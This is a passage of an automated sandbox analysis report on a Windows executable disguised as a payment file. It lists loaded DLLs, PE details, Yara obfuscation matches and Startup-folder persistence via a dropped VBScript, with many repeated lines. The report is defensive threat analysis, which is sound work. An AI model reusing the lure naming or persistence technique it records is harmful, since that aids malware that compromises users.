              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic file information: File size 1845544 > 1048576
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x195e00
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.pdbeA source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbg source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb2 source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: Yara matchFile source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.65b0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1644753165.00000000065B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 8140, type: MEMORYSTR
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E0006 pushad ; retf 3_2_026E001D
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile created: C:\Users\user\AppData\Local\scriptcase-php8.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbsJump to dropped file
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbsJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbsJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
